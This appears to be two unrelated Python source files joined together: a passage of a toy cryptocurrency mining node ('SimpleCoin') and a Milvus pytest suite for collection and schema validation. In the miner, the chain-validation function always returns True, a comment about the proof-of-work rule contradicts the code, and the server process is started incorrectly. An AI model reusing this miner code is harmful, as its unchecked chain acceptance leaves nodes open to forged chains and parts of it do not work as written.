self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
# Keep incrementing the incrementer until it's equal to a number divisible by 9
# and the proof of work of the previous block in the chain
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
# Check if any node found the solution every 60 seconds
if int((time.time() - start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
In order to prevent too many coins to be created, the process
is slowed down by a proof of work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(url=MINER_NODE_URL + '/txion',
params={'update': MINER_ADDRESS}).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": str(new_block_timestamp),
"data": new_block_data,
"hash": last_block_hash
}) + "\n")
a.send(BLOCKCHAIN)
requests.get(url=MINER_NODE_URL + '/blocks', params={'update': MINER_ADDRESS})
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(url=node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
"""Validate the submitted chain. If hashes are not correct, return false
block(str): json
"""
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
coins, they don't create it.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
# my code-----------------------------------------------------------
f = open("transactions_share.txt", "w")
# f = open(r"C:\transactions_share.txt", "w")
print("New transaction", file=f)
print("FROM: {0}".format(new_txion['from']), file=f)
print("TO: {0}".format(new_txion['to']), file=f)
print("AMOUNT: {0}\n".format(new_txion['amount']), file=f)
f.close()
# my code------------------------------------------------------------
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
# Try changing into an if/else statement as except is too broad.
try:
return vk.verify(signature, message.encode())
except:
return False
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
Make sure you are using the latest version or you may end in
a parallel chain.\n\n\n""")
if __name__ == '__main__':
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
p2 = Process(target=node.run(), args=b)
p2.start()
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
exp_shards_num = "shards_num"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_shards_num = 2
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"data": gen_vectors(1, default_dim),
"anns_field": default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": default_top_k,
}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with an empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create collection with dup name and none schema and data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
expected: two collection object is available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create with float-vec fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
expected: raise exception (not supported yet)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=default_dim), cf.gen_float_vec_field(name="tmp", dim=default_dim)]
schema = cf.gen_collection_schema(fields=fields)
err_msg = "multiple vector fields is not supported"
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.err_res,
check_items={"err_code": 1, "err_msg": err_msg})[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
method: set all fields if_primary false
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
